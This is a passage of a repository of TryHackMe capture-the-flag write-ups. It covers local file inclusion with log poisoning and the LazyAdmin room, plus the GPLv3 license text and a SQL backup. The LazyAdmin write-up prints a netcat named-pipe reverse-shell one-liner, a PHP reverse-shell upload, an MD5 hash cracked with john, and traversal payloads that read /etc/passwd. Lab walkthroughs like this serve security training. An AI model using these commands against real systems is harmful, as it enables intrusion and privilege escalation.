home.html?\n\n\t`You included home.html`\n\n- Type /etc/passwd in the parameter to read it.\n\n\t no answer needed\n\n- What user that it's not by default there is present?\n\n\t- `lfi`\n\n- Well done! You've exploited your first local file inclusion!\n\n\t no answer needed\n\n- Now that we know what Directory Traversal is, let's access the second walkthrough.\n\n\t no answer needed\n\n- Add the \"?page=\" parameter, and try to include the home page again. Does it work (Yes/No)?\n\n\t- `No`\n\n- Use \"../\" to move one directory up.\n\n\t no answer needed\n\n- What are the credit card numbers?\n\n\t- `http:///lfi2/lfi.php?page=../creditcard`\n\t- `****-****-****-****`\n\n- The same way you can include the passwd file. You'll have to move more directories up. Try reading the passwd file.\n\n\t no answer needed\n\n\t- `http:///lfi2/lfi.php?page=../../../../../etc/passwd`\n\n- Well done! You've exploited your first LFI using Directory Traversal.\n\n\t no answer needed\n\n- We got our hands a bit dirty with basic LFI and LFI using path traversal. Let's dig a little deeper, and use log poisoning to get access to the underlying operating system.\n\n\t no answer needed\n\n- We will inject some malicious php code into the server's log.\n\n\t no answer needed\n\n- Access the third walkthrough, add the \"?page=\" parameter and let's try reading the apache log file.\nThe log file is located at the following path: /var/log/apache2/access.log\n\n\tno answer needed\n\t\n\t- `http:///lfi/lfi.php?page=/var/log/apache2/access.log`\n\n- Can you read the log?\n\n\t- `yes`\n\n- Forward the request and add your parameter to the link (in my case lfi).\nThe link becomes: http:///lfi/lfi.php?page=/var/log/apache2/access.log&lfi=\nNow you can execute commands on the system!\n\n\tno answer needed\n\n\t- Open Burpsuite and set up the proxy.\n\t- Catch a request and edit it as shown, then forward it.\n\t- Add the lfi command to the url.\n\n- Give it a try and run uname -r. What's the output of the command?\n\n\t- `4.15.0-72-generic`\n\n- With this knowledge read the flag from the lfi user home directory\n\n\t- Add the command `ls%20/home/lfi` instead of `uname -r`\n\t- Add th command `cat%20/home/lfi/flag.txt`\n\t- `THM{************22******************}`\n\n\n" }, { "path": "LICENSE", "content": " GNU GENERAL PUBLIC LICENSE\n Version 3, 29 June 2007\n\n Copyright (C) 2007 Free Software Foundation, Inc. \n Everyone is permitted to copy and distribute verbatim copies\n of this license document, but changing it is not allowed.\n\n Preamble\n\n The GNU General Public License is a free, copyleft license for\nsoftware and other kinds of works.\n\n The licenses for most software and other practical works are designed\nto take away your freedom to share and change the works. By contrast,\nthe GNU General Public License is intended to guarantee your freedom to\nshare and change all versions of a program--to make sure it remains free\nsoftware for all its users. We, the Free Software Foundation, use the\nGNU General Public License for most of our software; it applies also to\nany other work released this way by its authors. You can apply it to\nyour programs, too.\n\n When we speak of free software, we are referring to freedom, not\nprice. Our General Public Licenses are designed to make sure that you\nhave the freedom to distribute copies of free software (and charge for\nthem if you wish), that you receive source code or can get it if you\nwant it, that you can change the software or use pieces of it in new\nfree programs, and that you know you can do these things.\n\n To protect your rights, we need to prevent others from denying you\nthese rights or asking you to surrender the rights. Therefore, you have\ncertain responsibilities if you distribute copies of the software, or if\nyou modify it: responsibilities to respect the freedom of others.\n\n For example, if you distribute copies of such a program, whether\ngratis or for a fee, you must pass on to the recipients the same\nfreedoms that you received. You must make sure that they, too, receive\nor can get the source code. And you must show them these terms so they\nknow their rights.\n\n Developers that use the GNU GPL protect your rights with two steps:\n(1) assert copyright on the software, and (2) offer you this License\ngiving you legal permission to copy, distribute and/or modify it.\n\n For the developers' and authors' protection, the GPL clearly explains\nthat there is no warranty for this free software. For both users' and\nauthors' sake, the GPL requires that modified versions be marked as\nchanged, so that their problems will not be attributed erroneously to\nauthors of previous versions.\n\n Some devices are designed to deny users access to install or run\nmodified versions of the software inside them, although the manufacturer\ncan do so. This is fundamentally incompatible with the aim of\nprotecting users' freedom to change the software. The systematic\npattern of such abuse occurs in the area of products for individuals to\nuse, which is precisely where it is most unacceptable. Therefore, we\nhave designed this version of the GPL to prohibit the practice for those\nproducts. If such problems arise substantially in other domains, we\nstand ready to extend this provision to those domains in future versions\nof the GPL, as needed to protect the freedom of users.\n\n Finally, every program is threatened constantly by software patents.\nStates should not allow patents to restrict development and use of\nsoftware on general-purpose computers, but in those that do, we wish to\navoid the special danger that patents applied to a free program could\nmake it effectively proprietary. To prevent this, the GPL assures that\npatents cannot be used to render the program non-free.\n\n The precise terms and conditions for copying, distribution and\nmodification follow.\n\n TERMS AND CONDITIONS\n\n 0. Definitions.\n\n \"This License\" refers to version 3 of the GNU General Public License.\n\n \"Copyright\" also means copyright-like laws that apply to other kinds of\nworks, such as semiconductor masks.\n\n \"The Program\" refers to any copyrightable work licensed under this\nLicense. Each licensee is addressed as \"you\". \"Licensees\" and\n\"recipients\" may be individuals or organizations.\n\n To \"modify\" a work means to copy from or adapt all or part of the work\nin a fashion requiring copyright permission, other than the making of an\nexact copy. The resulting work is called a \"modified version\" of the\nearlier work or a work \"based on\" the earlier work.\n\n A \"covered work\" means either the unmodified Program or a work based\non the Program.\n\n To \"propagate\" a work means to do anything with it that, without\npermission, would make you directly or secondarily liable for\ninfringement under applicable copyright law, except executing it on a\ncomputer or modifying a private copy. Propagation includes copying,\ndistribution (with or without modification), making available to the\npublic, and in some countries other activities as well.\n\n To \"convey\" a work means any kind of propagation that enables other\nparties to make or receive copies. Mere interaction with a user through\na computer network, with no transfer of a copy, is not conveying.\n\n An interactive user interface displays \"Appropriate Legal Notices\"\nto the extent that it includes a convenient and prominently visible\nfeature that (1) displays an appropriate copyright notice, and (2)\ntells the user that there is no warranty for the work (except to the\nextent that warranties are provided), that licensees may convey the\nwork under this License, and how to view a copy of this License. If\nthe interface presents a list of user commands or options, such as a\nmenu, a prominent item in the list meets this criterion.\n\n 1. Source Code.\n\n The \"source code\" for a work means the preferred form of the work\nfor making modifications to it. \"Object code\" means any non-source\nform of a work.\n\n A \"Standard Interface\" means an interface that either is an official\nstandard defined by a recognized standards body, or, in the case of\ninterfaces specified for a particular programming language, one that\nis widely used among developers working in that language.\n\n The \"System Libraries\" of an executable work include anything, other\nthan the work as a whole, that (a) is included in the normal form of\npackaging a Major Component, but which is not part of that Major\nComponent, and (b) serves only to enable use of the work with that\nMajor Component, or to implement a Standard Interface for which an\nimplementation is available to the public in source code form. A\n\"Major Component\", in this context, means a major essential component\n(kernel, window system, and so on) of the specific operating system\n(if any) on which the executable work runs, or a compiler used to\nproduce the work, or an object code interpreter used to run it.\n\n The \"Corresponding Source\" for a work in object code form means all\nthe source code needed to generate, install, and (for an executable\nwork) run the object code and to modify the work, including scripts to\ncontrol those activities. However, it does not include the work's\nSystem Libraries, or general-purpose tools or generally available free\nprograms which are used unmodified in performing those activities but\nwhich are not part of the work. For example, Corresponding Source\nincludes interface definition files associated with source files for\nthe work, and the source code for shared libraries and dynamically\nlinked subprograms that the work is specifically designed to require,\nsuch as by intimate data communication or control flow between those\nsubprograms and other parts of the work.\n\n The Corresponding Source need not include anything that users\ncan regenerate automatically from other parts of the Corresponding\nSource.\n\n The Corresponding Source for a work in source code form is that\nsame work.\n\n 2. Basic Permissions.\n\n All rights granted under this License are granted for the term of\ncopyright on the Program, and are irrevocable provided the stated\nconditions are met. This License explicitly affirms your unlimited\npermission to run the unmodified Program. The output from running a\ncovered work is covered by this License only if the output, given its\ncontent, constitutes a covered work. This License acknowledges your\nrights of fair use or other equivalent, as provided by copyright law.\n\n You may make, run and propagate covered works that you do not\nconvey, without conditions so long as your license otherwise remains\nin force. You may convey covered works to others for the sole purpose\nof having them make modifications exclusively for you, or provide you\nwith facilities for running those works, provided that you comply with\nthe terms of this License in conveying all material for which you do\nnot control copyright. Those thus making or running the covered works\nfor you must do so exclusively on your behalf, under your direction\nand control, on terms that prohibit them from making any copies of\nyour copyrighted material outside their relationship with you.\n\n Conveying under any other circumstances is permitted solely under\nthe conditions stated below. Sublicensing is not allowed; section 10\nmakes it unnecessary.\n\n 3. Protecting Users' Legal Rights From Anti-Circumvention Law.\n\n No covered work shall be deemed part of an effective technological\nmeasure under any applicable law fulfilling obligations under article\n11 of the WIPO copyright treaty adopted on 20 December 1996, or\nsimilar laws prohibiting or restricting circumvention of such\nmeasures.\n\n When you convey a covered work, you waive any legal power to forbid\ncircumvention of technological measures to the extent such circumvention\nis effected by exercising rights under this License with respect to\nthe covered work, and you disclaim any intention to limit operation or\nmodification of the work as a means of enforcing, against the work's\nusers, your or third parties' legal rights to forbid circumvention of\ntechnological measures.\n\n 4. Conveying Verbatim Copies.\n\n You may convey verbatim copies of the Program's source code as you\nreceive it, in any medium, provided that you conspicuously and\nappropriately publish on each copy an appropriate copyright notice;\nkeep intact all notices stating that this License and any\nnon-permissive terms added in accord with section 7 apply to the code;\nkeep intact all notices of the absence of any warranty; and give all\nrecipients a copy of this License along with the Program.\n\n You may charge any price or no price for each copy that you convey,\nand you may offer support or warranty protection for a fee.\n\n 5. Conveying Modified Source Versions.\n\n You may convey a work based on the Program, or the modifications to\nproduce it from the Program, in the form of source code under the\nterms of section 4, provided that you also meet all of these conditions:\n\n a) The work must carry prominent notices stating that you modified\n it, and giving a relevant date.\n\n b) The work must carry prominent notices stating that it is\n released under this License and any conditions added under section\n 7. This requirement modifies the requirement in section 4 to\n \"keep intact all notices\".\n\n c) You must license the entire work, as a whole, under this\n License to anyone who comes into possession of a copy. This\n License will therefore apply, along with any applicable section 7\n additional terms, to the whole of the work, and all its parts,\n regardless of how they are packaged. This License gives no\n permission to license the work in any other way, but it does not\n invalidate such permission if you have separately received it.\n\n d) If the work has interactive user interfaces, each must display\n Appropriate Legal Notices; however, if the Program has interactive\n interfaces that do not display Appropriate Legal Notices, your\n work need not make them do so.\n\n A compilation of a covered work with other separate and independent\nworks, which are not by their nature extensions of the covered work,\nand which are not combined with it such as to form a larger program,\nin or on a volume of a storage or distribution medium, is called an\n\"aggregate\" if the compilation and its resulting copyright are not\nused to limit the access or legal rights of the compilation's users\nbeyond what the individual works permit. Inclusion of a covered work\nin an aggregate does not cause this License to apply to the other\nparts of the aggregate.\n\n 6. Conveying Non-Source Forms.\n\n You may convey a covered work in object code form under the terms\nof sections 4 and 5, provided that you also convey the\nmachine-readable Corresponding Source under the terms of this License,\nin one of these ways:\n\n a) Convey the object code in, or embodied in, a physical product\n (including a physical distribution medium), accompanied by the\n Corresponding Source fixed on a durable physical medium\n customarily used for software interchange.\n\n b) Convey the object code in, or embodied in, a physical product\n (including a physical distribution medium), accompanied by a\n written offer, valid for at least three years and valid for as\n long as you offer spare parts or customer support for that product\n model, to give anyone who possesses the object code either (1) a\n copy of the Corresponding Source for all the software in the\n product that is covered by this License, on a durable physical\n medium customarily used for software interchange, for a price no\n more than your reasonable cost of physically performing this\n conveying of source, or (2) access to copy the\n Corresponding Source from a network server at no charge.\n\n c) Convey individual copies of the object code with a copy of the\n written offer to provide the Corresponding Source. This\n alternative is allowed only occasionally and noncommercially, and\n only if you received the object code with such an offer, in accord\n with subsection 6b.\n\n d) Convey the object code by offering access from a designated\n place (gratis or for a charge), and offer equivalent access to the\n Corresponding Source in the same way through the same place at no\n further charge. You need not require recipients to copy the\n Corresponding Source along with the object code. If the place to\n copy the object code is a network server, the Corresponding Source\n may be on a different server (operated by you or a third party)\n that supports equivalent copying facilities, provided you maintain\n clear directions next to the object code saying where to find the\n Corresponding Source. Regardless of what server hosts the\n Corresponding Source, you remain obligated to ensure that it is\n available for as long as needed to satisfy these requirements.\n\n e) Convey the object code using peer-to-peer transmission, provided\n you inform other peers where the object code and Corresponding\n Source of the work are being offered to the general public at no\n charge under subsection 6d.\n\n A separable portion of the object code, whose source code is excluded\nfrom the Corresponding Source as a System Library, need not be\nincluded in conveying the object code work.\n\n A \"User Product\" is either (1) a \"consumer product\", which means any\ntangible personal property which is normally used for personal, family,\nor household purposes, or (2) anything designed or sold for incorporation\ninto a dwelling. In determining whether a product is a consumer product,\ndoubtful cases shall be resolved in favor of coverage. For a particular\nproduct received by a particular user, \"normally used\" refers to a\ntypical or common use of that class of product, regardless of the status\nof the particular user or of the way in which the particular user\nactually uses, or expects or is expected to use, the product. A product\nis a consumer product regardless of whether the product has substantial\ncommercial, industrial or non-consumer uses, unless such uses represent\nthe only significant mode of use of the product.\n\n \"Installation Information\" for a User Product means any methods,\nprocedures, authorization keys, or other information required to install\nand execute modified versions of a covered work in that User Product from\na modified version of its Corresponding Source. The information must\nsuffice to ensure that the continued functioning of the modified object\ncode is in no case prevented or interfered with solely because\nmodification has been made.\n\n If you convey an object code work under this section in, or with, or\nspecifically for use in, a User Product, and the conveying occurs as\npart of a transaction in which the right of possession and use of the\nUser Product is transferred to the recipient in perpetuity or for a\nfixed term (regardless of how the transaction is characterized), the\nCorresponding Source conveyed under this section must be accompanied\nby the Installation Information. But this requirement does not apply\nif neither you nor any third party retains the ability to install\nmodified object code on the User Product (for example, the work has\nbeen installed in ROM).\n\n The requirement to provide Installation Information does not include a\nrequirement to continue to provide support service, warranty, or updates\nfor a work that has been modified or installed by the recipient, or for\nthe User Product in which it has been modified or installed. Access to a\nnetwork may be denied when the modification itself materially and\nadversely affects the operation of the network or violates the rules and\nprotocols for communication across the network.\n\n Corresponding Source conveyed, and Installation Information provided,\nin accord with this section must be in a format that is publicly\ndocumented (and with an implementation available to the public in\nsource code form), and must require no special password or key for\nunpacking, reading or copying.\n\n 7. Additional Terms.\n\n \"Additional permissions\" are terms that supplement the terms of this\nLicense by making exceptions from one or more of its conditions.\nAdditional permissions that are applicable to the entire Program shall\nbe treated as though they were included in this License, to the extent\nthat they are valid under applicable law. If additional permissions\napply only to part of the Program, that part may be used separately\nunder those permissions, but the entire Program remains governed by\nthis License without regard to the additional permissions.\n\n When you convey a copy of a covered work, you may at your option\nremove any additional permissions from that copy, or from any part of\nit. (Additional permissions may be written to require their own\nremoval in certain cases when you modify the work.) You may place\nadditional permissions on material, added by you to a covered work,\nfor which you have or can give appropriate copyright permission.\n\n Notwithstanding any other provision of this License, for material you\nadd to a covered work, you may (if authorized by the copyright holders of\nthat material) supplement the terms of this License with terms:\n\n a) Disclaiming warranty or limiting liability differently from the\n terms of sections 15 and 16 of this License; or\n\n b) Requiring preservation of specified reasonable legal notices or\n author attributions in that material or in the Appropriate Legal\n Notices displayed by works containing it; or\n\n c) Prohibiting misrepresentation of the origin of that material, or\n requiring that modified versions of such material be marked in\n reasonable ways as different from the original version; or\n\n d) Limiting the use for publicity purposes of names of licensors or\n authors of the material; or\n\n e) Declining to grant rights under trademark law for use of some\n trade names, trademarks, or service marks; or\n\n f) Requiring indemnification of licensors and authors of that\n material by anyone who conveys the material (or modified versions of\n it) with contractual assumptions of liability to the recipient, for\n any liability that these contractual assumptions directly impose on\n those licensors and authors.\n\n All other non-permissive additional terms are considered \"further\nrestrictions\" within the meaning of section 10. If the Program as you\nreceived it, or any part of it, contains a notice stating that it is\ngoverned by this License along with a term that is a further\nrestriction, you may remove that term. If a license document contains\na further restriction but permits relicensing or conveying under this\nLicense, you may add to a covered work material governed by the terms\nof that license document, provided that the further restriction does\nnot survive such relicensing or conveying.\n\n If you add terms to a covered work in accord with this section, you\nmust place, in the relevant source files, a statement of the\nadditional terms that apply to those files, or a notice indicating\nwhere to find the applicable terms.\n\n Additional terms, permissive or non-permissive, may be stated in the\nform of a separately written license, or stated as exceptions;\nthe above requirements apply either way.\n\n 8. Termination.\n\n You may not propagate or modify a covered work except as expressly\nprovided under this License. Any attempt otherwise to propagate or\nmodify it is void, and will automatically terminate your rights under\nthis License (including any patent licenses granted under the third\nparagraph of section 11).\n\n However, if you cease all violation of this License, then your\nlicense from a particular copyright holder is reinstated (a)\nprovisionally, unless and until the copyright holder explicitly and\nfinally terminates your license, and (b) permanently, if the copyright\nholder fails to notify you of the violation by some reasonable means\nprior to 60 days after the cessation.\n\n Moreover, your license from a particular copyright holder is\nreinstated permanently if the copyright holder notifies you of the\nviolation by some reasonable means, this is the first time you have\nreceived notice of violation of this License (for any work) from that\ncopyright holder, and you cure the violation prior to 30 days after\nyour receipt of the notice.\n\n Termination of your rights under this section does not terminate the\nlicenses of parties who have received copies or rights from you under\nthis License. If your rights have been terminated and not permanently\nreinstated, you do not qualify to receive new licenses for the same\nmaterial under section 10.\n\n 9. Acceptance Not Required for Having Copies.\n\n You are not required to accept this License in order to receive or\nrun a copy of the Program. Ancillary propagation of a covered work\noccurring solely as a consequence of using peer-to-peer transmission\nto receive a copy likewise does not require acceptance. However,\nnothing other than this License grants you permission to propagate or\nmodify any covered work. These actions infringe copyright if you do\nnot accept this License. Therefore, by modifying or propagating a\ncovered work, you indicate your acceptance of this License to do so.\n\n 10. Automatic Licensing of Downstream Recipients.\n\n Each time you convey a covered work, the recipient automatically\nreceives a license from the original licensors, to run, modify and\npropagate that work, subject to this License. You are not responsible\nfor enforcing compliance by third parties with this License.\n\n An \"entity transaction\" is a transaction transferring control of an\norganization, or substantially all assets of one, or subdividing an\norganization, or merging organizations. If propagation of a covered\nwork results from an entity transaction, each party to that\ntransaction who receives a copy of the work also receives whatever\nlicenses to the work the party's predecessor in interest had or could\ngive under the previous paragraph, plus a right to possession of the\nCorresponding Source of the work from the predecessor in interest, if\nthe predecessor has it or can get it with reasonable efforts.\n\n You may not impose any further restrictions on the exercise of the\nrights granted or affirmed under this License. For example, you may\nnot impose a license fee, royalty, or other charge for exercise of\nrights granted under this License, and you may not initiate litigation\n(including a cross-claim or counterclaim in a lawsuit) alleging that\nany patent claim is infringed by making, using, selling, offering for\nsale, or importing the Program or any portion of it.\n\n 11. Patents.\n\n A \"contributor\" is a copyright holder who authorizes use under this\nLicense of the Program or a work on which the Program is based. The\nwork thus licensed is called the contributor's \"contributor version\".\n\n A contributor's \"essential patent claims\" are all patent claims\nowned or controlled by the contributor, whether already acquired or\nhereafter acquired, that would be infringed by some manner, permitted\nby this License, of making, using, or selling its contributor version,\nbut do not include claims that would be infringed only as a\nconsequence of further modification of the contributor version. For\npurposes of this definition, \"control\" includes the right to grant\npatent sublicenses in a manner consistent with the requirements of\nthis License.\n\n Each contributor grants you a non-exclusive, worldwide, royalty-free\npatent license under the contributor's essential patent claims, to\nmake, use, sell, offer for sale, import and otherwise run, modify and\npropagate the contents of its contributor version.\n\n In the following three paragraphs, a \"patent license\" is any express\nagreement or commitment, however denominated, not to enforce a patent\n(such as an express permission to practice a patent or covenant not to\nsue for patent infringement). To \"grant\" such a patent license to a\nparty means to make such an agreement or commitment not to enforce a\npatent against the party.\n\n If you convey a covered work, knowingly relying on a patent license,\nand the Corresponding Source of the work is not available for anyone\nto copy, free of charge and under the terms of this License, through a\npublicly available network server or other readily accessible means,\nthen you must either (1) cause the Corresponding Source to be so\navailable, or (2) arrange to deprive yourself of the benefit of the\npatent license for this particular work, or (3) arrange, in a manner\nconsistent with the requirements of this License, to extend the patent\nlicense to downstream recipients. \"Knowingly relying\" means you have\nactual knowledge that, but for the patent license, your conveying the\ncovered work in a country, or your recipient's use of the covered work\nin a country, would infringe one or more identifiable patents in that\ncountry that you have reason to believe are valid.\n\n If, pursuant to or in connection with a single transaction or\narrangement, you convey, or propagate by procuring conveyance of, a\ncovered work, and grant a patent license to some of the parties\nreceiving the covered work authorizing them to use, propagate, modify\nor convey a specific copy of the covered work, then the patent license\nyou grant is automatically extended to all recipients of the covered\nwork and works based on it.\n\n A patent license is \"discriminatory\" if it does not include within\nthe scope of its coverage, prohibits the exercise of, or is\nconditioned on the non-exercise of one or more of the rights that are\nspecifically granted under this License. You may not convey a covered\nwork if you are a party to an arrangement with a third party that is\nin the business of distributing software, under which you make payment\nto the third party based on the extent of your activity of conveying\nthe work, and under which the third party grants, to any of the\nparties who would receive the covered work from you, a discriminatory\npatent license (a) in connection with copies of the covered work\nconveyed by you (or copies made from those copies), or (b) primarily\nfor and in connection with specific products or compilations that\ncontain the covered work, unless you entered into that arrangement,\nor that patent license was granted, prior to 28 March 2007.\n\n Nothing in this License shall be construed as excluding or limiting\nany implied license or other defenses to infringement that may\notherwise be available to you under applicable patent law.\n\n 12. No Surrender of Others' Freedom.\n\n If conditions are imposed on you (whether by court order, agreement or\notherwise) that contradict the conditions of this License, they do not\nexcuse you from the conditions of this License. If you cannot convey a\ncovered work so as to satisfy simultaneously your obligations under this\nLicense and any other pertinent obligations, then as a consequence you may\nnot convey it at all. For example, if you agree to terms that obligate you\nto collect a royalty for further conveying from those to whom you convey\nthe Program, the only way you could satisfy both those terms and this\nLicense would be to refrain entirely from conveying the Program.\n\n 13. Use with the GNU Affero General Public License.\n\n Notwithstanding any other provision of this License, you have\npermission to link or combine any covered work with a work licensed\nunder version 3 of the GNU Affero General Public License into a single\ncombined work, and to convey the resulting work. The terms of this\nLicense will continue to apply to the part which is the covered work,\nbut the special requirements of the GNU Affero General Public License,\nsection 13, concerning interaction through a network will apply to the\ncombination as such.\n\n 14. Revised Versions of this License.\n\n The Free Software Foundation may publish revised and/or new versions of\nthe GNU General Public License from time to time. Such new versions will\nbe similar in spirit to the present version, but may differ in detail to\naddress new problems or concerns.\n\n Each version is given a distinguishing version number. If the\nProgram specifies that a certain numbered version of the GNU General\nPublic License \"or any later version\" applies to it, you have the\noption of following the terms and conditions either of that numbered\nversion or of any later version published by the Free Software\nFoundation. If the Program does not specify a version number of the\nGNU General Public License, you may choose any version ever published\nby the Free Software Foundation.\n\n If the Program specifies that a proxy can decide which future\nversions of the GNU General Public License can be used, that proxy's\npublic statement of acceptance of a version permanently authorizes you\nto choose that version for the Program.\n\n Later license versions may give you additional or different\npermissions. However, no additional obligations are imposed on any\nauthor or copyright holder as a result of your choosing to follow a\nlater version.\n\n 15. Disclaimer of Warranty.\n\n THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY\nAPPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT\nHOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM \"AS IS\" WITHOUT WARRANTY\nOF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,\nTHE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\nPURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM\nIS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF\nALL NECESSARY SERVICING, REPAIR OR CORRECTION.\n\n 16. Limitation of Liability.\n\n IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING\nWILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS\nTHE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY\nGENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE\nUSE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF\nDATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD\nPARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),\nEVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF\nSUCH DAMAGES.\n\n 17. Interpretation of Sections 15 and 16.\n\n If the disclaimer of warranty and limitation of liability provided\nabove cannot be given local legal effect according to their terms,\nreviewing courts shall apply local law that most closely approximates\nan absolute waiver of all civil liability in connection with the\nProgram, unless a warranty or assumption of liability accompanies a\ncopy of the Program in return for a fee.\n\n END OF TERMS AND CONDITIONS\n\n How to Apply These Terms to Your New Programs\n\n If you develop a new program, and you want it to be of the greatest\npossible use to the public, the best way to achieve this is to make it\nfree software which everyone can redistribute and change under these terms.\n\n To do so, attach the following notices to the program. It is safest\nto attach them to the start of each source file to most effectively\nstate the exclusion of warranty; and each file should have at least\nthe \"copyright\" line and a pointer to where the full notice is found.\n\n \n Copyright (C) \n\n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with this program. If not, see .\n\nAlso add information on how to contact you by electronic and paper mail.\n\n If the program does terminal interaction, make it output a short\nnotice like this when it starts in an interactive mode:\n\n Copyright (C) \n This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.\n This is free software, and you are welcome to redistribute it\n under certain conditions; type `show c' for details.\n\nThe hypothetical commands `show w' and `show c' should show the appropriate\nparts of the General Public License. Of course, your program's commands\nmight be different; for a GUI interface, you would use an \"about box\".\n\n You should also get your employer (if you work as a programmer) or school,\nif any, to sign a \"copyright disclaimer\" for the program, if necessary.\nFor more information on this, and how to apply and follow the GNU GPL, see\n.\n\n The GNU General Public License does not permit incorporating your program\ninto proprietary programs. If your program is a subroutine library, you\nmay consider it more useful to permit linking proprietary applications with\nthe library. If this is what you want to do, use the GNU Lesser General\nPublic License instead of this License. But first, please read\n.\n" }, { "path": "LazyAdmin/README.md", "content": "# LazyAdmin\n\nHave some fun! There might be multiple ways to get user access.\n\n- What is the user flag?\n\n\t- `nmap -sV -sC `. There are two services exposed: 22/tcp (ssh) and 1583/tcp (simbaexpress)\n\t- `nmap --script=vuln `\n\t-\t\tNmap scan report for 10.10.58.33\n\t\t\tHost is up (0.081s latency).\n\t\t\tNot shown: 998 closed ports\n\t\t\tPORT STATE SERVICE\n\t\t\t22/tcp open ssh\n\t\t\t80/tcp open http\n\t\t\t|_http-csrf: Couldn't find any CSRF vulnerabilities.\n\t\t\t|_http-dombased-xss: Couldn't find any DOM based XSS.\n\t\t\t| http-enum: \n\t\t\t|_ /content/: Potentially interesting folder\n\t\t\t| http-slowloris-check: \n\t\t\t| VULNERABLE:\n\t\t\t| Slowloris DOS attack\n\t\t\t| State: LIKELY VULNERABLE\n\t\t\t| IDs: CVE:CVE-2007-6750\n\t\t\t| Slowloris tries to keep many connections to the target web server open and hold\n\t\t\t| them open as long as possible. It accomplishes this by opening connections to\n\t\t\t| the target web server and sending a partial request. By doing so, it starves\n\t\t\t| the http server's resources causing Denial Of Service.\n\t\t\t| \n\t\t\t| Disclosure date: 2009-09-17\n\t\t\t| References:\n\t\t\t| http://ha.ckers.org/slowloris/\n\t\t\t|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750\n\t\t\t|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.\n\t\t\t\n\t\tSeems good.\n\t- Visit `http:///content/` on browser.\n\t- `gobuster dir -u http:///content/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt`\n\t-\t \t/images (Status: 301)\n\t\t\t/js (Status: 301)\n\t\t\t/inc (Status: 301)\n\t\t\t/as (Status: 301)\n\t\t\t/_themes (Status: 301)\n\t\t\t/attachment (Status: 301)\n\t\t\t\n\t\tInteresting...\n\t- In `http:///content/inc` there is `mysql\\_backup` folder. Download the .sql file inside.\n\t- Open it with or something similar. You should read a line with a passwd header and the a hashed value.\n\t- Use `hash-identifier` to detect the type of the hash. MD5. ok.\n\t- `cat > hash.txt`\n\t- `sudo john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=RAW-MD5`\n\t- Go into the login page `http:///content/as/`\n\t- Login with the username inside the .sql file and the cracked password.\n\t- Go into `Ads` section.\n\t- Load the `rshell.php` into the content manager (change the IP address with yours!)\n\t- `nc -lvnp 1234` on your machine.\n\t- Go into `http:///content/inc/ads` and click on the file you've just uploaded.\n\t- You gained a shell. `cd /home/itguy && cat user.txt`\n\t- `THM{63**bce92******ad111**********07}`\n\n- What is the root flag?\n\n\t- `sudo -l`\n\t- Ok. We don't need sudo password for backup.pl and perl.\n\t- Analyze backup.pl, it runs /etc/copy.sh. Let'see.\n\t- It's a reverse shell. Change the specified ip address to yours.\n\t- `echo \"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 5554 >/tmp/f\" > /etc/copy.sh`\n\t- `nc -lnvp 5554` on your machine\n\t- `sudo /usr/bin/perl /home/itguy/backup.pl` on target machine.\n\t- `cat /root/root.txt`\n\t- `THM{663**41d01******7cb**********99f}`\n" }, { "path": "LazyAdmin/hash.txt", "content": "42f749ade7f9e195bf475f37a44cafcb" }, { "path": "LazyAdmin/mysql_bakup_20191129023059-1.5.1.sql", "content": " 'DROP TABLE IF EXISTS `%--%_attachment`;',\n 1 => 'CREATE TABLE `%--%_attachment` (\n `id` int(10) NOT NULL AUTO_INCREMENT,\n `post_id` int(10) NOT NULL,\n `file_name` varchar(255) NOT NULL,\n `date` int(10) NOT NULL,\n `downloads` int(10) NOT NULL,\n PRIMARY KEY (`id`)\n) ENGINE=MyISAM DEFAULT CHARSET=utf8;',\n 2 => 'DROP TABLE IF EXISTS `%--%_category`;',\n 3 => 'CREATE TABLE `%--%_category` (\n `id` int(4) NOT NULL AUTO_INCREMENT,\n `name` varchar(255) NOT NULL,\n `link` varchar(128) NOT NULL,\n `title` text NOT NULL,\n `description` varchar(255) NOT NULL,\n `keyword` varchar(255) NOT NULL,\n `sort_word` text NOT NULL,\n `parent_id` int(10) NOT NULL DEFAULT \\'0\\',\n `template` varchar(60) NOT NULL,\n PRIMARY KEY (`id`),\n UNIQUE KEY `link` (`link`)\n) ENGINE=MyISAM DEFAULT CHARSET=utf8;',\n 4 => 'DROP TABLE IF EXISTS `%--%_comment`;',\n 5 => 'CREATE TABLE `%--%_comment` (\n `id` int(10) NOT NULL AUTO_INCREMENT,\n `name` varchar(60) NOT NULL DEFAULT \\'\\',\n `email` varchar(255) NOT NULL DEFAULT \\'\\',\n `website` varchar(255) NOT NULL,\n `info` text NOT NULL,\n `post_id` int(10) NOT NULL 